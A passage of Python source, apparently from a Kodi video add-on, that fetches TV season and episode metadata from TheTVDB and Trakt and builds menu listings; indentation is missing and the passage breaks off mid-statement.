except:
return
for item in seasons:
try:
premiered = client.parseDOM(item, 'FirstAired')[0]
if premiered == '' or '-00' in premiered: premiered = '0'
premiered = client.replaceHTMLCodes(premiered)
premiered = premiered.encode('utf-8')
if status == 'Ended': pass
elif premiered == '0': raise Exception()
elif int(re.sub('[^0-9]', '', str(premiered))) > int(re.sub('[^0-9]', '', str(self.today_date))): raise Exception()
season = client.parseDOM(item, 'SeasonNumber')[0]
season = '%01d' % int(season)
season = season.encode('utf-8')
thumb = [i for i in artwork if client.parseDOM(i, 'Season')[0] == season]
try: thumb = client.parseDOM(thumb[0], 'BannerPath')[0]
except: thumb = ''
if not thumb == '': thumb = self.tvdb_image + thumb
else: thumb = '0'
thumb = client.replaceHTMLCodes(thumb)
thumb = thumb.encode('utf-8')
if thumb == '0': thumb = poster
self.list.append({'season': season, 'tvshowtitle': tvshowtitle, 'year': year, 'premiered': premiered, 'status': status, 'studio': studio, 'genre': genre, 'duration': duration, 'rating': rating, 'votes': votes, 'mpaa': mpaa, 'cast': cast, 'plot': plot, 'code': imdb, 'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'poster': poster, 'banner': banner, 'fanart': fanart, 'thumb': thumb})
except:
pass
for item in episodes:
try:
premiered = client.parseDOM(item, 'FirstAired')[0]
if premiered == '' or '-00' in premiered: premiered = '0'
premiered = client.replaceHTMLCodes(premiered)
premiered = premiered.encode('utf-8')
if status == 'Ended': pass
elif premiered == '0': raise Exception()
elif int(re.sub('[^0-9]', '', str(premiered))) > int(re.sub('[^0-9]', '', str(self.today_date))): raise Exception()
season = client.parseDOM(item, 'SeasonNumber')[0]
season = '%01d' % int(season)
season = season.encode('utf-8')
episode = client.parseDOM(item, 'EpisodeNumber')[0]
episode = re.sub('[^0-9]', '', '%01d' % int(episode))
episode = episode.encode('utf-8')
title = client.parseDOM(item, 'EpisodeName')[0]
if title == '': title = '0'
title = client.replaceHTMLCodes(title)
title = title.encode('utf-8')
name = '%s S%02dE%02d' % (tvshowtitle, int(season), int(episode))
try: name = name.encode('utf-8')
except: pass
try: thumb = client.parseDOM(item, 'filename')[0]
except: thumb = ''
if not thumb == '': thumb = self.tvdb_image + thumb
else: thumb = '0'
thumb = client.replaceHTMLCodes(thumb)
thumb = thumb.encode('utf-8')
if not thumb == '0': pass
elif not fanart == '0': thumb = fanart.replace(self.tmdb_image, self.tmdb_poster).replace(self.tvdb_image, self.tvdb_poster)
elif not poster == '0': thumb = poster
try: rating = client.parseDOM(item, 'Rating')[0]
except: rating = ''
if rating == '': rating = '0'
rating = client.replaceHTMLCodes(rating)
rating = rating.encode('utf-8')
try: director = client.parseDOM(item, 'Director')[0]
except: director = ''
director = [x for x in director.split('|') if not x == '']
director = ' / '.join(director)
if director == '': director = '0'
director = client.replaceHTMLCodes(director)
director = director.encode('utf-8')
try: writer = client.parseDOM(item, 'Writer')[0]
except: writer = ''
writer = [x for x in writer.split('|') if not x == '']
writer = ' / '.join(writer)
if writer == '': writer = '0'
writer = client.replaceHTMLCodes(writer)
writer = writer.encode('utf-8')
try: episodeplot = client.parseDOM(item, 'Overview')[0]
except: episodeplot = ''
if episodeplot == '': episodeplot = '0'
if episodeplot == '0': episodeplot = plot
episodeplot = client.replaceHTMLCodes(episodeplot)
try: episodeplot = episodeplot.encode('utf-8')
except: pass
self.list.append({'title': title, 'season': season, 'episode': episode, 'tvshowtitle': tvshowtitle, 'year': year, 'premiered': premiered, 'status': status, 'alter': alter, 'studio': studio, 'genre': genre, 'duration': duration, 'rating': rating, 'votes': votes, 'mpaa': mpaa, 'director': director, 'writer': writer, 'cast': cast, 'plot': episodeplot, 'name': name, 'code': imdb, 'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'poster': poster, 'banner': banner, 'fanart': fanart, 'thumb': thumb})
except:
pass
return self.list
def seasonDirectory(self, items):
if items == None or len(items) == 0: return
isFolder = True if control.setting('autoplay') == 'false' and control.setting('host_select') == '1' else False
isFolder = False if control.window.getProperty('PseudoTVRunning') == 'True' else isFolder
traktMode = False if trakt.getTraktCredentials() == False else True
addonPoster, addonBanner = control.addonPoster(), control.addonBanner()
addonFanart, settingFanart = control.addonFanart(), control.setting('fanart')
sysaddon = sys.argv[0]
try:
favitems = favourites.getFavourites('tvshows')
favitems = [i[0] for i in favitems]
except:
pass
try: indicators = playcount.getSeasonIndicators(items[0]['imdb'])
except: pass
watchedMenu = control.lang(30263).encode('utf-8') if trakt.getTraktIndicatorsInfo() == True else control.lang(30263).encode('utf-8')
unwatchedMenu = control.lang(30264).encode('utf-8') if trakt.getTraktIndicatorsInfo() == True else control.lang(30264).encode('utf-8')
for i in items:
try:
label = '%s %s' % ('Season', i['season'])
systitle = sysname = urllib.quote_plus(i['tvshowtitle'])
imdb, tmdb, tvdb, tvrage, year, season = i['imdb'], i['tmdb'], i['tvdb'], i['tvrage'], i['year'], i['season']
poster, banner, fanart, thumb = i['poster'], i['banner'], i['fanart'], i['thumb']
if poster == '0': poster = addonPoster
if banner == '0' and poster == '0': banner = addonBanner
elif banner == '0': banner = poster
if thumb == '0' and poster == '0': thumb = addonPoster
elif thumb == '0': thumb = poster
meta = dict((k,v) for k, v in i.iteritems() if not v == '0')
meta.update({'trailer': '%s?action=trailer&name=%s' % (sysaddon, sysname)})
if i['duration'] == '0': meta.update({'duration': '60'})
try: meta.update({'duration': str(int(meta['duration']) * 60)})
except: pass
sysmeta = urllib.quote_plus(json.dumps(meta))
try:
if season in indicators: meta.update({'playcount': 1, 'overlay': 7})
else: meta.update({'playcount': 0, 'overlay': 6})
except Exception as e:
control.log('#indicators %s' %e )
pass
url = '%s?action=episodes&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s&season=%s' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage, season)
cm = []
if isFolder == False:
cm.append((control.lang(30261).encode('utf-8'), 'RunPlugin(%s?action=queueItem)' % sysaddon))
cm.append((control.lang(30262).encode('utf-8'), 'Action(Info)'))
cm.append((watchedMenu, 'RunPlugin(%s?action=tvPlaycount&name=%s&imdb=%s&tvdb=%s&season=%s&query=7)' % (sysaddon, systitle, imdb, tvdb, season)))
cm.append((unwatchedMenu, 'RunPlugin(%s?action=tvPlaycount&name=%s&imdb=%s&tvdb=%s&season=%s&query=6)' % (sysaddon, systitle, imdb, tvdb, season)))
#cm.append((control.lang(30263).encode('utf-8'), 'RunPlugin(%s?action=tvPlaycount&name=%s&year=%s&imdb=%s&tvdb=%s&season=%s&query=7)' % (sysaddon, systitle, year, imdb, tvdb, season)))
#cm.append((control.lang(30264).encode('utf-8'), 'RunPlugin(%s?action=tvPlaycount&name=%s&year=%s&imdb=%s&tvdb=%s&season=%s&query=6)' % (sysaddon, systitle, year, imdb, tvdb, season)))
if traktMode == True:
cm.append((control.lang(30265).encode('utf-8'), 'RunPlugin(%s?action=traktManager&name=%s&tvdb=%s&content=tvshow)' % (sysaddon, sysname, tvdb)))
if not imdb in favitems and not tvdb in favitems: cm.append((control.lang(30266).encode('utf-8'), 'RunPlugin(%s?action=addFavourite&meta=%s&content=tvshows)' % (sysaddon, sysmeta)))
else: cm.append((control.lang(30267).encode('utf-8'), 'RunPlugin(%s?action=deleteFavourite&meta=%s&content=tvshows)' % (sysaddon, sysmeta)))
cm.append((control.lang(30268).encode('utf-8'), 'RunPlugin(%s?action=tvshowToLibrary&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s)' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage)))
cm.append((control.lang(30269).encode('utf-8'), 'RunPlugin(%s?action=addView&content=seasons)' % sysaddon))
item = control.item(label=label, iconImage=thumb, thumbnailImage=thumb)
try: item.setArt({'poster': thumb, 'tvshow.poster': poster, 'season.poster': thumb, 'banner': banner, 'tvshow.banner': banner, 'season.banner': banner})
except: pass
if settingFanart == 'true' and not fanart == '0':
item.setProperty('Fanart_Image', fanart)
elif not addonFanart == None:
item.setProperty('Fanart_Image', addonFanart)
item.setInfo(type='Video', infoLabels = meta)
item.setProperty('Video', 'true')
item.addContextMenuItems(cm, replaceItems=True)
control.addItem(handle=int(sys.argv[1]), url=url, listitem=item, isFolder=True)
except:
pass
try: control.property(int(sys.argv[1]), 'showplot', items[0]['plot'])
except: pass
control.content(int(sys.argv[1]), 'seasons')
control.directory(int(sys.argv[1]), cacheToDisc=True)
views.setView('seasons', {'skin.confluence': 500})
class episodes:
def __init__(self):
self.list = []
self.trakt_link = 'http://api-v2launch.trakt.tv'
self.tvdb_key = base64.urlsafe_b64decode('MUQ2MkYyRjkwMDMwQzQ0NA==')
self.datetime = (datetime.datetime.utcnow() - datetime.timedelta(hours = 5))
self.systime = (self.datetime).strftime('%Y%m%d%H%M%S%f')
self.today_date = (self.datetime).strftime('%Y-%m-%d')
self.trakt_user = control.setting('trakt.user')
self.info_lang = control.info_lang or 'en'
self.tvdb_info_link = 'http://thetvdb.com/api/%s/series/%s/all/%s.zip' % (self.tvdb_key, '%s', '%s')
self.tvdb_image = 'http://thetvdb.com/banners/'
self.tvdb_poster = 'http://thetvdb.com/banners/_cache/'
self.mycalendar_link = 'http://api-v2launch.trakt.tv/calendars/my/shows/%s/31/' % (self.datetime - datetime.timedelta(days = 32)).strftime('%Y-%m-%d')
self.progress_link = 'http://api-v2launch.trakt.tv/users/%s/watched/shows' % self.trakt_user
self.calendar_link = 'http://api-v2launch.trakt.tv/calendars/all/shows/%s/%s'
self.scn_link = 'http://m2v.ru'
self.added_link = 'http://m2v.ru/?Part=11&func=part&page=1'
def get(self, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, season=None, episode=None, idx=True):
try:
if idx == True:
if episode == None:
self.list = cache.get(seasons().tvdb_list, 1, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang, season)
else:
self.list = cache.get(seasons().tvdb_list, 1, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang, '-1')
num = [x for x,y in enumerate(self.list) if y['season'] == str(season) and y['episode'] == str(episode)][-1]
self.list = [y for x,y in enumerate(self.list) if x >= num]
self.episodeDirectory(self.list)
return self.list
else:
self.list = seasons().tvdb_list(tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang, '-2')
return self.list
except:
pass
def calendar(self, url):
try:
try: url = getattr(self, url + '_link')
except: pass
try: u = urlparse.urlparse(url).netloc.lower()
except: pass
if url in self.progress_link:
self.list = cache.get(self.trakt_list2, 1, url, self.info_lang)
elif url in self.mycalendar_link:
self.list = cache.get(self.trakt_list, 1, url)
elif u in self.trakt_link:
self.list = cache.get(self.trakt_list, 8760, url)
elif u in self.scn_link:
self.list = cache.get(self.scn_list, 1, url)
self.episodeDirectory(self.list)
return self.list
except:
pass
def widget(self):
if not trakt.getTraktCredentials() == False:
setting = control.setting('tv_alt_widget')
else:
setting = control.setting('tv_widget')
if setting == '2':
self.favourites()
elif setting == '3':
self.calendar(self.progress_link)
elif setting == '4':
self.calendar(self.mycalendar_link)
else:
self.calendar(self.added_link)
def favourites(self):
try:
favitems = favourites.getFavourites('tvshows')
favitems = [i[0] for i in favitems]
if len(favitems) == 0: raise Exception()
threads = []
def f(url): self.list += cache.get(self.trakt_list, 8760, url)
for i in range(1, 31):
url = self.calendar_link % ((self.datetime - datetime.timedelta(days = i)).strftime('%Y-%m-%d'), '1')
threads.append(workers.Thread(f, url))
[i.start() for i in threads]
[i.join() for i in threads]
self.list = [i for i in self.list if i['imdb'] in favitems or i['tvdb'] in favitems]
self.list = sorted(self.list, key=lambda k: k['premiered'], reverse=True)
self.episodeDirectory(self.list)
return self.list
except:
return
def calendars(self):
map = [(30521, 'Monday'), (30522, 'Tuesday'), (30523, 'Wednesday'), (30524, 'Thursday'), (30525, 'Friday'), (30526, 'Saturday'), (30527, 'Sunday'), (30528, 'January'), (30529, 'February'), (30530, 'March'), (30531, 'April'), (30532, 'May'), (30533, 'June'), (30534, 'July'), (30535, 'August'), (30536, 'September'), (30537, 'October'), (30538, 'November'), (30539, 'December')]
for i in range(0, 30):
try:
name = (self.datetime - datetime.timedelta(days = i))
name = '[B]%s[/B] : %s' % (name.strftime('%A'), name.strftime('%d %B'))
for m in map: name = name.replace(m[1], control.lang(m[0]).encode('utf-8'))
try: name = name.encode('utf-8')
except: pass
url = self.calendar_link % ((self.datetime - datetime.timedelta(days = i)).strftime('%Y-%m-%d'), '1')
self.list.append({'name': name, 'url': url, 'image': 'calendar.jpg', 'action': 'calendar'})
except:
pass
self.addDirectory(self.list)
return self.list
def trakt_list(self, url):
try:
itemlist = []
url += '?extended=full,images'
result = trakt.getTrakt(url)
items = json.loads(result)
except:
return
for item in items:
try:
title = item['episode']['title']
if title == None or title == '': raise Exception()
title = client.replaceHTMLCodes(title)
title = title.encode('utf-8')
season = item['episode']['season']
season = re.sub('[^0-9]', '', '%01d' % int(season))
if season == '0': raise Exception()
season = season.encode('utf-8')
episode = item['episode']['number']
episode = re.sub('[^0-9]', '', '%01d' % int(episode))
if episode == '0': raise Exception()
episode = episode.encode('utf-8')
tvshowtitle = item['show']['title']
if tvshowtitle == None or tvshowtitle == '': raise Exception()
tvshowtitle = client.replaceHTMLCodes(tvshowtitle)
tvshowtitle = tvshowtitle.encode('utf-8')
year = item['show']['year']
year = re.sub('[^0-9]', '', str(year))
year = year.encode('utf-8')
name = '%s S%02dE%02d' % (tvshowtitle, int(season), int(episode))
try: name = name.encode('utf-8')
except: pass
imdb = item['show']['ids']['imdb']
if imdb == None or imdb == '': imdb = '0'
else: imdb = 'tt' + re.sub('[^0-9]', '', str(imdb))
imdb = imdb.encode('utf-8')
tvdb = item['show']['ids']['tvdb']
if tvdb == None or tvdb == '': raise Exception()
tvdb = re.sub('[^0-9]', '', str(tvdb))
tvdb = tvdb.encode('utf-8')
tmdb = item['show']['ids']['tmdb']
if tmdb == None or tmdb == '': tmdb = '0'
tmdb = re.sub('[^0-9]', '', str(tmdb))
tmdb = tmdb.encode('utf-8')
tvrage = item['show']['ids']['tvrage']
if tvrage == None or tvrage == '': tvrage = '0'
tvrage = re.sub('[^0-9]', '', str(tvrage))
tvrage = tvrage.encode('utf-8')
poster = '0'
try: poster = item['show']['images']['poster']['medium']
except: pass
if poster == None or not '/posters/' in poster: poster = '0'
poster = poster.rsplit('?', 1)[0]
poster = poster.encode('utf-8')
banner = poster
try: banner = item['show']['images']['banner']['full']
except: pass
if banner == None or not '/banners/' in banner: banner = poster
banner = banner.rsplit('?', 1)[0]
banner = banner.encode('utf-8')
fanart = '0'
try: fanart = item['show']['images']['fanart']['full']
except: pass
if fanart == None or not '/fanarts/' in fanart: fanart = '0'
fanart = fanart.rsplit('?', 1)[0]
fanart = fanart.encode('utf-8')
thumb1 = item['episode']['images']['screenshot']['thumb']
thumb2 = item['show']['images']['thumb']['full']
if '/screenshots/' in thumb1: thumb = thumb1
elif '/thumbs/' in thumb2: thumb = thumb2
else: thumb = fanart
thumb = thumb.rsplit('?', 1)[0]
try: thumb = thumb.encode('utf-8')
except: pass
premiered = item['episode']['first_aired']
try: premiered = re.compile('(\d{4}-\d{2}-\d{2})').findall(premiered)[0]
except: premiered = '0'
premiered = premiered.encode('utf-8')
studio = item['show']['network']
if studio == None: studio = '0'
studio = studio.encode('utf-8')
alter = item['show']['genres']
if any(x in alter for x in ['documentary', 'reality']): alter = '1'
else: alter = '0'
alter = alter.encode('utf-8')
genre = item['show']['genres']
genre = [i.title() for i in genre]
if genre == []: genre = '0'
genre = ' / '.join(genre)
genre = genre.encode('utf-8')
try: duration = str(item['show']['runtime'])
except: duration = '0'
if duration == None: duration = '0'
duration = duration.encode('utf-8')
try: rating = str(item['episode']['rating'])
except: rating = '0'
if rating == None or rating == '0.0': rating = '0'
rating = rating.encode('utf-8')
try: votes = str(item['show']['votes'])
except: votes = '0'
try: votes = str(format(int(votes),',d'))
except: pass
if votes == None: votes = '0'
votes = votes.encode('utf-8')
mpaa = item['show']['certification']
if mpaa == None: mpaa = '0'
mpaa = mpaa.encode('utf-8')
plot = item['episode']['overview']
if plot == None or plot == '': plot = item['show']['overview']
if plot == None or plot == '': plot = '0'
plot = client.replaceHTMLCodes(plot)
plot = plot.encode('utf-8')
itemlist.append({'title': title, 'season': season, 'episode': episode, 'tvshowtitle': tvshowtitle, 'year': year, 'premiered': premiered, 'status': 'Continuing', 'alter': alter, 'studio': studio, 'genre': genre, 'duration': duration, 'rating': rating, 'votes': votes, 'mpaa': mpaa, 'director': '0', 'writer': '0', 'cast': '0', 'plot': plot, 'name': name, 'code': imdb, 'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'poster': poster, 'banner': banner, 'fanart': fanart, 'thumb': thumb})
except:
pass
itemlist = itemlist[::-1]
return itemlist
def trakt_list2(self, url, lang):
try:
url += '?extended=full'
result = trakt.getTrakt(url)
result = json.loads(result)
items = []
except:
return
for item in result:
try:
num_1 = 0
for i in range(0, len(item['seasons'])): num_1 += len(item['seasons'][i]['episodes'])
num_2 = int(item['show']['aired_episodes'])
if num_1 >= num_2: raise Exception()
season = str(item['seasons'][-1]['number'])
season = season.encode('utf-8')
episode = str(item['seasons'][-1]['episodes'][-1]['number'])
episode = episode.encode('utf-8')
tvshowtitle = item['show']['title']
if tvshowtitle == None or tvshowtitle == '': raise Exception()
tvshowtitle = client.replaceHTMLCodes(tvshowtitle)
tvshowtitle = tvshowtitle.encode('utf-8')
year = item['show']['year']
year = re.sub('[^0-9]', '', str(year))
if int(year) > int(self.datetime.strftime('%Y')): raise Exception()
imdb = item['show']['ids']['imdb']
if imdb == None or imdb == '': raise Exception()
imdb = 'tt' + re.sub('[^0-9]', '', str(imdb))
imdb = imdb.encode('utf-8')
tvdb = item['show']['ids']['tvdb']
if tvdb == None or tvdb == '': raise Exception()
tvdb = re.sub('[^0-9]', '', str(tvdb))
tvdb = tvdb.encode('utf-8')
tmdb = item['show']['ids']['tmdb']
if tmdb == None or tmdb == '': tmdb = '0'
tmdb = re.sub('[^0-9]', '', str(tmdb))
tmdb = tmdb.encode('utf-8')
tvrage = item['show']['ids']['tvrage']
if tvrage == None or tvrage == '': tvrage = '0'
tvrage = re.sub('[^0-9]', '', str(tvrage))
tvrage = tvrage.encode('utf-8')
items.append({'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'tvshowtitle': tvshowtitle, 'year': year, 'season': season, 'episode': episode})
except:
pass
def items_list(i):
try:
tvdb_lang = re.sub('bg', 'en', lang)
url = self.tvdb_info_link % (i['tvdb'], tvdb_lang)
data = urllib2.urlopen(url, timeout=10).read()
zip = zipfile.ZipFile(StringIO.StringIO(data))
result = zip.read('%s.xml' % tvdb_lang)
artwork = zip.read('banners.xml')
zip.close()
result = result.split('<Episode>')
item = [x for x in result if '<EpisodeNumber>' in x]
item2 = result[0]
num = [x for x,y in enumerate(item) if re.compile('<SeasonNumber>(.+?)</SeasonNumber>').findall(y)[0] == str(i['season']) and re.compile('<EpisodeNumber>(.+?)</EpisodeNumber>').findall(y)[0] == str(i['episode'])][-1]
item = [y for x,y in enumerate(item) if x > num][0]
premiered = client.parseDOM(item, 'FirstAired')[0]
if premiered == '' or '-00' in premiered: premiered = '0'
premiered = client.replaceHTMLCodes(premiered)
premiered = premiered.encode('utf-8')
try: status = client.parseDOM(item2, 'Status')[0]
except: status = ''
if status == '': status = 'Ended'
status = client.replaceHTMLCodes(status)
status = status.encode('utf-8')
if status == 'Ended': pass
elif premiered == '0': raise Exception()
elif int(re.sub('[^0-9]', '', str(premiered))) > int(re.sub('[^0-9]', '', str(self.today_date))): raise Exception()
title = client.parseDOM(item, 'EpisodeName')[0]
if title == '': title = '0'
title = client.replaceHTMLCodes(title)
title = title.encode('utf-8')
season = client.parseDOM(item, 'SeasonNumber')[0]
season = '%01d' % int(season)
season = season.encode('utf-8')
episode = client.parseDOM(item, 'EpisodeNumber')[0]
episode = re.sub('[^0-9]', '', '%01d' % int(episode))
episode = episode.encode('utf-8')
tvshowtitle = i['tvshowtitle']
imdb, tmdb, tvdb, tvrage = i['imdb'], i['tmdb'], i['tvdb'], i['tvrage']
year = i['year']
try: year = year.encode('utf-8')
except: pass
name = '%s S%02dE%02d' % (tvshowtitle, int(season), int(episode))
try: name = name.encode('utf-8')
except: pass
try: poster = client.parseDOM(item2, 'poster')[0]
except: poster = ''
if not poster == '': poster = self.tvdb_image + poster
else: poster = '0'
poster = client.replaceHTMLCodes(poster)
poster = poster.encode('utf-8')
try: banner = client.parseDOM(item2, 'banner')[0]
except: banner = ''
if not banner == '': banner = self.tvdb_image + banner
else: banner = '0'
banner = client.replaceHTMLCodes(banner)
banner = banner.encode('utf-8')
try: fanart = client.parseDOM(item2, 'fanart')[0]
except: fanart = ''
if not fanart == '': fanart = self.tvdb_image + fanart
else: fanart = '0'
fanart = client.replaceHTMLCodes(fanart)
fanart = fanart.encode('utf-8')
try: thumb = client.parseDOM(item, 'filename')[0]
except: thumb = ''
if not thumb == '': thumb = self.tvdb_image + thumb
else: thumb = '0'
thumb = client.replaceHTMLCodes(thumb)
thumb = thumb.encode('utf-8')
if not poster == '0': pass
elif not fanart == '0': poster = fanart
elif not banner == '0': poster = banner
if not banner == '0': pass
elif not fanart == '0': banner = fanart
elif not poster == '0': banner = poster
if not thumb == '0': pass
elif not fanart == '0': thumb = fanart.replace(self.tvdb_image, self.tvdb_poster)
elif not poster == '0': thumb = poster
try: studio = client.parseDOM(item2, 'Network')[0]
except: studio = ''
if studio == '': studio = '0'
studio = client.replaceHTMLCodes(studio)
studio = studio.encode('utf-8')
try: alter = client.parseDOM(item2, 'Genre')[0]
except: alter = '0'
if any(x in alter for x in ['Documentary', 'Reality', 'Game Show', 'Talk Show']): alter = '1'
else: alter = '0'
alter = alter.encode('utf-8')
try: genre = client.parseDOM(item2, 'Genre')[0]
except: genre = ''
genre = [x for x in genre.split('|') if not x == '']
genre = ' / '.join(genre)
if genre == '': genre = '0'
genre = client.replaceHTMLCodes(genre)
genre = genre.encode('utf-8')
try: duration = client.parseDOM(item2, 'Runtime')[0]
except: duration = ''
if duration == '': duration = '0'
duration = client.replaceHTMLCodes(duration)
duration = duration.encode('utf-8')
try: rating = client.parseDOM(item, 'Rating')[0]
except: rating = ''
if rating == '': rating = '0'
rating = client.replaceHTMLCodes(rating)
rating = rating.encode('utf-8')
try: votes = client.parseDOM(item2, 'RatingCount')[0]
except: votes = '0'
if votes == '': votes = '0'
votes = client.replaceHTMLCodes(votes)
votes = votes.encode('utf-8')
try: mpaa = client.parseDOM(item2, 'ContentRating')[0]
except: mpaa = ''
if mpaa == '': mpaa = '0'
mpaa = client.replaceHTMLCodes(mpaa)
mpaa = mpaa.encode('utf-8')
try: director = client.parseDOM(item, 'Director')[0]
except: director = ''
director = [x for x in director.split('|') if not x == '']
director = ' / '.join(director)
if director == '': director = '0'
director = client.replaceHTMLCodes(director)
director = director.encode('utf-8')
try: writer = client.parseDOM(item, 'Writer')[0]
except: writer = ''
writer = [x for x in writer.split('|') if not x == '']
writer = ' / '.join(writer)
if writer == '': writer = '0'
writer = client.replaceHTMLCodes(writer)
writer = writer.encode('utf-8')
try: cast = client.parseDOM(item2, 'Actors')[0]
except: cast = ''
cast = [x for x in cast.split('|') if not x == '']
try: cast = [(x.encode('utf-8'), '') for x in cast]
except: cast = []
try: plot = client.parseDOM(item, 'Overview')[0]
except: plot = ''
if plot == '':
try: plot = client.parseDOM(item2, 'Overview')[0]
except: plot = ''
if plot == '': plot = '0'
plot = client.replaceHTMLCodes(plot)
plot = plot.encode('utf-8')
self.list.append({'title': title, 'season': season, 'episode': episode, 'tvshowtitle': tvshowtitle, 'year': year, 'premiered': premiered, 'status': status, 'alter': alter, 'studio': studio, 'genre': genre, 'duration': duration, 'rating': rating, 'votes': votes, 'mpaa': mpaa, 'director': director, 'writer': writer, 'cast': cast, 'plot': plot, 'name': name, 'code': imdb, 'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'poster': poster, 'banner': banner, 'fanart': fanart, 'thumb': thumb, 'action': 'episodes'})
except:
pass
items = items[:30]
threads = []
for i in items: threads.append(workers.Thread(items_list, i))
[i.start() for i in threads]
[i.join() for i in threads]
try: self.list = sorted(self.list, key=lambda k: k['premiered'], reverse=True)
except: pass
return self.list
def scn_list(self, url):
try:
result = client.request(url)
url = client.parseDOM(result, 'a', ret='href', attrs = {'id': 'nav'})
url = [i for i in url if 'page=2' in i]
url += re.compile('href="(.+?)".+?>PREV<').findall(result)
if len(url) > 0:
url = self.scn_link + '/' + url[0]
url = client.replaceHTMLCodes(url)
result += client.request(url)
result = result.decode('iso-8859-1').encode('utf-8')
result = client.parseDOM(result, 'tr', attrs = {'class': 'MainTable'})
dates = [re.compile('(\d{4}-\d{2}-\d{2})').findall(i) for i in result]
dates = [i[0] for i in dates if not len(i) == 0]
dates = [x for y,x in enumerate(dates) if x not in dates[:y]]
shows = [client.parseDOM(i, 'a')[0] for i in result]
shows = [re.compile('(.*)[.](S\d+?E\d+?)[.]').findall(i) for i in shows]
shows = [(i[0][0].replace('.', ' '), i[0][1]) for i in shows if not len(i) == 0]
shows = [cleantitle.tv(i[0]) + ' ' + i[1] for i in shows]
shows = [i.encode('utf-8') for i in shows]
shows = [x for y,x in enumerate(shows) if x not in shows[:y]]
url = self.calendar_link % (str(dates[-1]), len(dates))
self.list = self.trakt_list(url)
self.list = [i for i in self.list if '%s S%02dE%02d' % (cleantitle.tv(i['tvshowtitle']), int(i['season']), int(i['episode'])) in shows]
return self.list
except:
return
def episodeDirectory(self, items):
if items == None or len(items) == 0: return
isFolder = True if control.setting('autoplay') == 'false' and control.setting('host_select') == '1' else False
isFolder = False if control.window.getProperty('PseudoTVRunning') == 'True' else isFolder
playbackMenu = control.lang(30271).encode('utf-8') if control.setting('autoplay') == 'true' else control.lang(30270).encode('utf-8')
traktMode = False if trakt.getTraktCredentials() == False else True
cacheToDisc = False
addonPoster, addonBanner = control.addonPoster(), control.addonBanner()
addonFanart, settingFanart = control.addonFanart(), control.setting('fanart')
sysaddon = sys.argv[0]
try: multi = [i['tvshowtitle'] for i in items]
except: multi = []
multi = len([x for y,x in enumerate(multi) if x not in multi[:y]])
multi = True if multi > 1 else False
try: sysaction = items[0]['action']
except: sysaction = ''
try:
favitems = favourites.getFavourites('tvshows')
favitems = [i[0] for i in favitems]
except:
pass
indicators = playcount.getTVShowIndicators(refresh=True)
watchedMenu = control.lang(30263).encode('utf-8') if trakt.getTraktIndicatorsInfo() == True else control.lang(30263).encode('utf-8')
unwatchedMenu = control.lang(30264).encode('utf-8') if trakt.getTraktIndicatorsInfo() == True else control.lang(30264).encode('utf-8')
for i in items:
try:
if i['title'] == '0':
label = '%sx%02d . %s %s' % (i['season'], int(i['episode']), 'Episode', i['episode'])
else:
label = '%sx%02d . %s' % (i['season'], int(i['episode']), i['title'])
if multi == True:
label = '%s - %s' % (i['tvshowtitle'], label)
systitle = sysname = urllib.quote_plus(i['tvshowtitle'])
episodetitle, episodename = urllib.quote_plus(i['title']), urllib.quote_plus(i['name'])
syspremiered = urllib.quote_plus(i['premiered'])
imdb, tmdb, tvdb, tvrage, year, season, episode, alter = i['imdb'], i['tmdb'], i['tvdb'], i['tvrage'], i['year'], i['season'], i['episode'], i['alter']
poster, banner, fanart, thumb = i['poster'], i['banner'], i['fanart'], i['thumb']
if poster == '0': poster = addonPoster
if banner == '0' and poster == '0': banner = addonBanner
elif banner == '0': banner = poster
if thumb == '0' and fanart == '0': thumb = addonFanart
elif thumb == '0': thumb = fanart
meta = dict((k,v) for k, v in i.iteritems() if not v == '0')
meta.update({'trailer': '%s?action=trailer&name=%s' % (sysaddon, sysname)})
if i['duration'] == '0': meta.update({'duration': '60'})
try: meta.update({'duration': str(int(meta['duration']) * 60)})
except: pass
sysmeta = urllib.quote_plus(json.dumps(meta))
url = '%s?action=play&name=%s&title=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s&season=%s&episode=%s&tvshowtitle=%s&alter=%s&date=%s&meta=%s&t=%s' % (sysaddon, episodename, episodetitle, year, imdb, tmdb, tvdb, tvrage, season, episode, systitle, alter, syspremiered, sysmeta, self.systime)
sysurl = urllib.quote_plus(url)
if isFolder == True:
url = '%s?action=sources&name=%s&title=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s&season=%s&episode=%s&tvshowtitle=%s&alter=%s&date=%s&meta=%s' % (sysaddon, episodename, episodetitle, year, imdb, tmdb, tvdb, tvrage, season, episode, systitle, alter, syspremiered, sysmeta)
if sysaction == 'episodes':
url = '%s?action=episodes&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s&season=%s&episode=%s' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage, season, episode)
isFolder = True ; cacheToDisc = True
cm = []
cm.append((playbackMenu, 'RunPlugin(%s?action=alterSources&url=%s&meta=%s)' % (sysaddon, sysurl, sysmeta)))
if isFolder == False:
cm.append((control.lang(30261).encode('utf-8'), 'RunPlugin(%s?action=queueItem)' % sysaddon))
cm.append((control.lang(30272).encode('utf-8'), 'Action(Info)'))
if multi == True:
cm.append((control.lang(30274).encode('utf-8'), 'ActivateWindow(Videos,%s?action=seasons&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s,return)' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage)))
try:
overlay = int(playcount.getEpisodeOverlay(indicators, imdb, tvdb, season, episode))
if overlay == 7:
